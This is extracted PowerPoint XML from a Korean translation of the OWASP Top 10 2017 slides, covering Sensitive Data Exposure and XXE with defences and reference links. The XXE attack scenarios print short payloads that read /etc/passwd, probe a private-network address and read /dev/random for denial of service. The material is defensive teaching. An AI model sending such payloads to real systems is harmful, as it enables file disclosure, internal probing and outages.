Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="Externa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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="Externa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s://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter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9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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs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owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External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slide" Target="slide13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology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601.html" TargetMode="External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cwe.mitre.org/data/definitions/451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hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799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ASP/Top10/tree/master/2017/datacall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23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slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submission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hyperlink" Target="https://www.facebook.com/sp2004/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cafe.naver.com/securityplu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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk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19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Proje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Testing_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls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owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId12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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASV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4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15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF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wasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm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cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework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23.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculato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Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html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cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank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wasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Application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Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#160;Authentication" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet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pages.nist.gov/800-63-3/sp800-63b.html#memsecre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owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_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4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8327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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWAS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3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large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00" y="8532000"/>
            <a:ext cx="1081144" cy="257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828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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017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가장 위험한 웹 애플리케이션 보안 위험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</a:t>
            </a:r>
            <a:endParaRPr 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5032" y="8636913"/>
            <a:ext cx="438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iberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 문서는 아래 라이센스의 보호를 받습니다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iberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p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Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000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4876397" cy="32488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8758980"/>
            <a:ext cx="163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iberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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7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공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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#1: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애플리케이션은 자동화된 데이터베이스 암호화를 사용하여 데이터베이스의 신용 카드 번호를 암호화합니다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그러나 이 데이터는 검색될 때 자동으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="85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복호화되므로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SQL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삽입 결함으로 일반 텍스트의 신용 카드 번호가 검색될 수 있습니다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 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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#2: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모든 웹 페이지에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TLS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를 반드시 사용하지 않거나 약한 암호화를 지원하는 사이트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공격자는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안전하지 않은 무선 네트워크에서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쉽게 네트워크 트래픽을 모니터링하고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HTTPS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를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로 낮추며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요청을 중간에서 가로채고 사용자 세션 쿠키를 탈취합니다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이어서 공격자는 이 쿠키를 다시 사용해서 사용자의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인증된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세션을 악용하여 사용자의 개인 정보에 접근하거나 수정합니다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금융 거래시 수취인과 같은 전송된 모든 데이터를 바꿀 수도 있습니다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="85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#3: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패스워드를 저장할 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="85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솔트를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ko-KR" altLang="en-US" sz="85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하용하지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않거나 간단한 해시를 사용하는 데이터베이스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파일 업로드 취약점을 통해 공격자는 패스워드 데이터베이스를 가져올 수 있습니다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솔트되지 않은 해시들은 미리 계산된 해시들을 가진 레인보우 테이블에 노출될 수 있습니다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간단하거나 빠른 해시 함수로 만들어진 해시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="85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솔트를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적용했더라도 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GPU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를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="85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크랙될</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="8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취약점 확인 방법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우선 전송을 하거나 하지 않거나 데이터 보호 요구사항을 확인합니다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패스워드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신용카드 번호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건강기록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개인정보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업무 기술들은 특별한 보호가 필요하며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EU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의 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General Data Protection Regulation(GDPR)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 같은 개인보호법이나 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PCI Data Security Standard(PCI DSS)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 같은 금융 데이터 보호 규정에 해당된다면 특별히 보호해야 합니다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보호가 필요한 데이터의 경우</a:t>
            </a:r>
            <a:r>
              <a:rPr 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평문으로 데이터를 전송합니까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? HTTP, SMTP, FTP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 같은 프로토콜이 그런 경우입니다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외부 인터넷 트래픽은 특히 위험합니다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로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="88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밸런서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웹 서버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백엔드</a:t>
            </a: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시스템 간의 내부 트래픽도 확인합니다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8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백업을 포함하여 저장할 때 평문으로 처리하는 민감한 데이터가 있습니까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="88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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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오래되거나 취약한 암호 알고리즘을 이전 및 현재 소스 코드에 적용하고 있지 않습니까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?</a:t>
            </a:r>
            <a:r>
              <a:rPr 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디폴트 암호 키 사용 및 약한 암호 키를 생성 및 재사용하거나 적절한 키 관리 및 변경이 이루어 집니까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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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사용자 프로그램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브라우저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에서 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="88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디렉티브나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헤더와 같은 암호화를 적용하고 있습니까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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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사용자 프로그램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앱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메일 클라이언트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에서 서버 인증이 유효한지 확인합니까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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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ASVS 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Crypto (V7)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Data Prot (V9)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SSL/TLS (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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를 참조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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ko-KR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OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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7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Proactive Controls: Protect Data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OWASP Application Security Verification Standard (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V7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9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10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  <a:endParaRPr lang="de-DE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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"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Cheat Sheet: </a:t>
            </a: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Transport Layer Protection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OWASP Cheat Sheet: User Privacy Protection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OWASP Cheat Sheets: Password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and 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Cryptographic Storage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OWASP Security Headers Project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Cheat Sheet: HSTS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OWASP Testing Guide: Testing for weak cryptography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ko-KR" altLang="en-US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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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CWE-220: Exposure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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sens.</a:t>
            </a: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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t> information through data queries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CWE-310: Cryptographic Issues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CWE-311: Missing Encryption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CWE-312: Cleartext Storage of Sensitive Information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CWE-319: Cleartext Transmission of Sensitive Information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CWE-326: Weak Encryption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CWE-327: Broken/Risky Crypto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CWE-359: Exposure of Private Information (Privacy Violation)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최소한 다음 내용을 준수하고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레퍼런스를 참고합니다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애플리케이션에서 사용하는 데이터를 처리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저장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전송으로 분류합니다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개인정보 보호법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법률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업무 필요에 따라 어떤 데이터가 민감한지 파악합니다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분류에 따라 통제합니다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불필요한 민감한 데이터는 저장하지 않습니다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가능한 빨리 그런 데이터를 폐기 및 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PCI DSS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규정을 준수하거나 불필요한 내용을 줄입니다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가지고 있지 않으면 도둑맞을 일도 없습니다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모든 민감한 데이터들을 암호화하는지 확인합니다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최신의 강력한 표준 알고리즘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프로토콜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암호 키를 사용하는지 확인합니다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;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적합한 키 관리를 사용합니다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Perfect Forward Secrecy(PFS)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암호를 사용하는 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TLS,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서버의 암호 우선 순위 지정 및 보안 매개 변수와 같은 보안 프로토콜로 전송 중인 모든 데이터를 암호화 하십시오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HTTP Strict Transport Security(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14"/>
              </a:rPr>
              <a:t>HSTS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 같은 지시문을 사용하여 암호화를 시행합니다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민감한 데이터를 포함하는 응답 캐시를 비활성화합니다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22"/>
              </a:rPr>
              <a:t>Argon2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23"/>
              </a:rPr>
              <a:t>scrypt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87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24"/>
              </a:rPr>
              <a:t>bcrypt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25"/>
              </a:rPr>
              <a:t>PBKDF2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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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같은 워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="87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팩터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딜레이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="87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팩터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가진 적응형 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="87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솔트된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해시 함수를 사용하여 패스워드를 저장합니다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개별적으로 설정들의 유효성을 검증합니다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A3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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>민감한 데이터 노출</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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97414"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0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Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs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0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공격자는 보안 체계를 직접 공격하는 대신 전송 구간 및 브라우저와 같은 사용자 프로그램에서 키를 훔치거나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중간자 공격 및 서버에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="86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평문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데이터를 훔치고자 합니다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대부분 수작업으로 공격을 합니다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사전에 훔친 패스워크 데이터베이스에는 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Graphics Processing </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="86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Unis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(GPU)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를 사용해서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="86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브루트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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포스 공격을 할 수도 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="86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지난 몇 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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년동안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이 방법은 가장 일반적이고 영향력 있는 공격 방법이었습니다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단순히 민감한 데이터를 암호화하지 않고 있는 것이 가장 큰 결함입니다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암호화를 사용하면서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키 생성 및 관리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약한 알고리즘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프로토콜 및 암호 사용은 일반적입니다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암호 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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해싱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저장 기술의 경우가 특히 그렇습니다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전송 중인 데이터의 경우 서버 측면의 약점은 주로 감지하기 쉽지만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저장간 데이터의 경우에는 찾기가 어렵습니다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공격자는 잘 보호된 데이터에 대해서는 공격을 실패하게 됩니다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일반적으로 이런 데이터는 건강 기록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신용 정보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개인 정보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신용카드와 같은 민감한 개인 정보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(PII)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를 포함하며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EU GDPR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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이나 각 나라의 개인보호법과 같은 법률이나 규정에서 정의한 보호 방법이 필요합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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2880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8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20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29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EEB8DCC7-EC6C-4FD5-A56F-8F1CF7C16DA6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09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공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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임베디드 장비 공격을 포함하는 수많은 공개 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 </a:t>
            </a:r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이슈들이 발견되고 있습니다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XXE</a:t>
            </a:r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는 많은 의존성을 가진 것을 포함하는 수많은 예상치 못한 곳에서 발생합니다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가장 쉬운 방법은 악의적인 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XML </a:t>
            </a:r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파일을 업로드하는 것이며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이것이 가능하다면 취약합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="88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sz="880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#1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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공격자는 서버에서 데이터를 가져오려고 시도합니다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sz="88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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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   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&lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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&lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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</a:t>
            </a:r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en-US" sz="88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"file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" b="1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#2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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공격자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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라인을 변경하여 서버의 사설망을 찾으려 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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  <a:p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</a:t>
            </a:r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en-US" sz="88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"https://192.168.1.1/private" &gt;]&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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#3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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공격자는 잠재적으로 무한 파일을 포함하여 서비스 거부 공격을 시도합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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  <a:p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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="88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en-US" sz="88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"file:///dev/random" &gt;]&gt;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취약점 확인 방법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아래와 같은 애플리케이션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특히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기반 웹 서비스나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다운스트림을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사용할 경우 공격에 취약할 수 있습니다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애플리케이션이 직접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입력 받거나 특히 신뢰할 수 없는 곳의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업로드하거나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문서에 신뢰할 수 없는 데이터를 입력할 경우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이는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프로세서가 처리합니다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애플리케이션에 있는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프로세서나 웹 서비스 기반의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SOAP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에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4"/>
              </a:rPr>
              <a:t>Document Type Definitions(DTD)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활성화되어 있을 경우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DTD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처리를 비활성화하는 정확한 방법은 처리기마다 다르기 때문에 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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’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 같은 문서들을 참조하기를 권장합니다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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRP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애플리케이션이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페더레이션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보안이나 싱글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사인온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(SSO)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의 목적으로 확인 처리를 위해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SAML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사용할 경우입니다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SAML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은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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assertio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확인하기 위해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사용하며 취약할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애플리케이션이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1.2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이전의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SOAP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사용하고 있다면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개체들이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SOAP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프레임워크에 넘겨질 경우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XXE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공격에 민감할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dirty="0">
              <a:latin typeface="+mn-ea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XXE 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공격에 취약하다는 것은 애플리케이션이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR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Billion Laughs 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공격을 포함하는 서비스 공격에 취약하다는 것을 의미합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510"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  <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod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6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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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ko-KR" sz="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‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800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Application Security Verification Standard</a:t>
            </a:r>
